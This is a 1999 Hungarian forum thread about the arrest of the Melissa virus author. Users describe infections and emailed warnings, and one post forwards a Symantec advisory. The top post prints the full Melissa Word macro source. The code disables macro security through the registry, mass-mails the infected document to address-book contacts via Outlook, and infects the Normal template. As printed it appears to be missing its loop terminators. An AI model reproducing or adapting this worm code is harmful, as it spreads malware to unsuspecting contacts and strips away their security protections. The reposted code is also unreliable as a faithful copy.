
Részletes keresés

Exleprás Creative Commons License 1999.04.06 0 0 20
Íme a vírus forráskódja:

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
Peep = ""
Next y
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
End If
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 < Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub

Tigrissy Creative Commons License 1999.04.03 0 0 19

Akik nem tudnak angolul azoknak itt van egy magyar nyelvű oldal egyébbként szinte az összes virusírtót készítő kiadott már valamilyen programkiegészítést a Milissahoz.

Üdv Tigrissy!

bennfentes Creative Commons License 1999.04.03 0 0 18
Kösz a linket.
Örülök,hogy végre kezdik öket elkapkodni. Már nagyon tele van velük a pupom. Ha annyira zseninek érzi magát, csináljon valami hasznosat!
TechW Creative Commons License 1999.04.03 0 0 17
Lehet hogy megis?
TechW Creative Commons License 1999.04.03 0 0 16
Itt Tobbet olvashattok a kitalalojarol.
Bocsanat az elozo szemetelesert, de az HTML nemmukodik.
Nemhiszem hogy en rontottam el valamit!?
rutyi Creative Commons License 1999.04.03 0 0 14
A leírása szerint Word dokumentumokkal fertőz ,vagy mi.De ki tudja millyen furfangos dolgokat eszelnek ki egyesek ,hogy próbára tegyék az ember idegeit.

Azért légy mindíg óvatos,biztos ami biztos.Sose lehet tudni.

Na szia !Remélem tudtam segíteni?

Előzmény: bennfentes (13)
bennfentes Creative Commons License 1999.04.03 0 0 13
Kösz. Akkor tényleg csak figyelmeztetés, de nem a virus.:))
rutyi Creative Commons License 1999.04.03 0 0 12
Ok !
Ugy néz ki semmi gond.Ez csak egy htm.
Valami reklám vagy mifene.
Előzmény: bennfentes (11)
bennfentes Creative Commons License 1999.04.03 0 0 11
Kösz, elküldtem. De nem tudom kivenni, melyik az attachment, és melyik a levél:))
Ez a yahoo levelezö olyan furcsa!
rutyi Creative Commons License 1999.04.03 0 0 10
Hát a fene tudja ,de ha félsz megnézni ,és megbízól bennem ,küldj egy E-mailt és mellékeld hozzá a kapott mellékletedet és én megnézem ,mert az én Addres Book-omba már nincs beírva senki.
Előzmény: bennfentes (9)
bennfentes Creative Commons License 1999.04.03 0 0 9
Kösz. Nekem senki nem panaszkodott, de nem emlékeszem,hogy kicsomagoltam-e a csatolatot. Most nem merek hozzányulni.

Szóval azért hallgat mindenki, mert ez már meg lett tárgyalva?

rutyi Creative Commons License 1999.04.03 0 0 8
Mindenek előtt az Outlook élt(nincs beállítva levélellenőrzésre)
E-mail bejön ,de mivel egy rakás hülye E-mailt kaptam az utobbi időben ,nem néztem végig őket ,csak néhányat.Az egyikhez volt csatolás is (ne kérdezd mi volt nem néztem meg teljesen). eltellik kb 10 perc ,és az Addres Book-om néhány tagja ,szám szerint 4 visszaküldött egy-egy e-mailt ,hogy "mi az a hülyeség amit átküldtem"?
A lényeg az ,hogy átment hozzájuk egy-egy E-mail aminek melléklete volt ,pedig én E-mail méllé SOHA nem tettem mellékletet .Azt nem tudom hogy pontosan nekik mi ment át ,mert azt nem írták le ,de ők is hasonlókra panaszkodtak.
Az ,hogy a kis hölgyet kaptam meg kb85-90 % ,mert lehet ,hogy más vírusok is terjednek így ,de mivel olvastam az iNTerNeTTo-n a hírét így erre gyanakszom (a szex rész is bejött ,bár igaz ,hogy az ICQ-n),mert nem nagyon ismerem a vírusokat.
Előzmény: bennfentes (7)
bennfentes Creative Commons License 1999.04.03 0 0 7
HOnnan tudtad, hogy a géped megkapta a virust?
rutyi Creative Commons License 1999.04.03 0 0 6
jó' van na ,
Mán át azt a levelet ,amit kaptál ,hogy behatóbban tanulmányoztathassam egy haverommal
Egyébként ,én már meddővé tettem a hölgyet (egyenlőre).
bennfentes Creative Commons License 1999.04.03 0 0 5
Nem azért, de ahhoz képest, hogy ez az elsö eset, hogy valakit ilyesmiért letartóztatnak, meg hogy majdnem mindenki kapott ilyen virust/levelet, nem töritek magatokat a hozzászólással!

Mégegyszer, irgum-burgum, tessék hozzászólni!!!!!

Delfina Creative Commons License 1999.04.03 0 0 4
Yfel, ha még a neten vagy, gyere vissza ICQ-ra!
Yfel Creative Commons License 1999.04.03 0 0 3
Hehehe.... NeScape-et hasznalok es Lotus Smartsuite97-et Outlook es Word helyett :)))))) Ugyhogy Melissa kisasszony bekaphatja :))))

Na csa

rutyi Creative Commons License 1999.04.02 0 0 2
Én a vírust is megkaptam.
Hosszas Addres Book COPY után DEL ,utána hosszas Addres Book HELYREÁLLÍT papírra ,mivel a keresőm nem találta meg Melissa kisasszonyt.Én voltam a hülye ,hogy nem figyeltem jobban .
Mellesleg ,mivel nemtom még mire képes a drága ,megjegyzem ,hogy egy rakás hülye URL címet kaptam ICQ-n Pamela nicknevű akárkitől .És hát a franc tudja miért ,de az egyiket megnéztem.
first name:Pamela
Last name:Anderson
Hogy ki a rák lehetett ,nemtom.
Csak azért említettem ,mert nemtudom honnan jött a vírus pontosan.Egyébként ,az Elender szerint az Ő hibályukból ,egyik hírlevelükkel együtt egy rakás hülye E-mail érkezett aminek semmi haszna nem volt ,mert mindenféle baromság volt benne .
bennfentes Creative Commons License 1999.04.02 0 0 1
A hitelesség kedvéért itt a levél, amit kaptam:

> -----Original Message----- From: Leanne Muirhead/TMI
> Posted At: Monday,
> March 29, 1999 10:52 AM Posted To: MisCELLaneous
> Conversation: Info on
> Virus Subject: Info on Virus (From the Sumantec
> site:)
> W97M.Mailissa VirusName: W97M.Mailissa Aliases:
> W97M.Melissa Infection
> Length: one VBA5 module named Melissa Area of
> Infection: Microsoft Word
> 97 documents Likelihood: Common Region Reported: US
> Characteristics:
> Macro, Wild Description:
> W97M.Mailissa is a common macro virus with a unique
> payload.
> Similar to W97M.Pri, the virus turns off the
> protection upon
> opening an infected document in MS Word 2000. This
> disables MS Word
> 2000 macro prompt the next time the document is
> opened.
> It infects MS Word 97 document by adding a new VBA5
> (macro) module named
> Melissa. Although there is nothing unique in the
> infection routine of
> this macro virus, it has a payload that utilizes MS
> Outlook to send an
> attachment of the infected MS Word 97 document being
> opened.
> Technical Notes When opening or closing an infected
> document, the virus
> determines if there has been a previous mass
> by checking the
> following registry key:
> "HKEY_CURRENT_USER\Software\Microsoft\Office\" as
> "Melissa?" value.
> The value data is set to " Kwyjibo" if the mass
> emailing has been
> done on the current machine.
> If the virus does not find the registry entry, it
> will do the following:
> 1. Open MS Outlook.
> 2. Use MAPI calls, to retrieve the user's profile
> use MS Outlook
> 3. Creates a new email message that sends up to 50
> addresses listed in
> MS Outlook address book.
> 4. The email will have the subject line of :
> "Important Message From
> USERNAME" where USERNAME is taken from MS Word
> profile.
> 5. The email message is "Here is that document you
> asked for ... don't
> show anyone else ;-)"
> 6. Attaches the active document (the infected
> document being opened or
> closed) to the email message.
> 7. Sends the email.
> Please note that
> "HKEY_CURRENT_USER\Software\Microsoft\Office" is a
> registry entry created by MS Office. The virus
> simply adds a new value
> into this registry entry: "Melissa?". As stated
> above, the value is set
> to " Kwyjibo", if the virus has successfully
> mass emailed infected
> documents from the system. Once the value is set,
> the virus does not
> attempt another mass emailing.
> The second payload replaces the currently selected
> text of the document
> with:
> " Twenty-two points, plus triple-word-score, plus
> fifty points for using
> all my letters. Game's over. I'm outta here."
> Repair notes:
> Norton AntiVirus users can protect themselves from
> this virus by
> downloading the current virus definitions either
> through LiveUpdate or
> from the following webpage:

originalqszi Creative Commons License 1999.04.02 0 0 0
Jé egy 0-ás!!!!!!!!!!!
bennfentes Creative Commons License 1999.04.02 0 0 topiknyitó
Most hallom a rádióban, hogy letartóztatták a "Melissa" virus terjesztöjét.
Mivel én két ismerösömtöl is kaptam "Melissa" virusról levelet, szeretném tudni, más is kapott-e, és mi az igazság.
Ha jól emlékszem, a levélben annyi volt, hogy ez a virus leveleket ir az "Address Book"-ban levö elsö 50 e-mail cimre. Most nem tudom,hogy figyelmeztetés-e amit kaptam, vagy maga a virus?
Különben volt ott valami, hogy hogyan állapitsam meg, hogy van-e virusom. Megnéztem, és aszerint nincs! De ez lehetett egy trükk is:((
Akitöl a levelet kaptam egy nyugdijas kisöreg, és nem tudom, tudja-e egyáltalán miröl beszéltem, mikor megkérdeztem töle, miért küldte ezt nekem?

Mivel talán rossz hirem van az áprilisi tréfák miatt:)) szeretném hangsúlyozni, hogy ez nem rémhir, hanem komoly!!!

Ha kedveled azért, ha nem azért nyomj egy lájkot a Fórumért!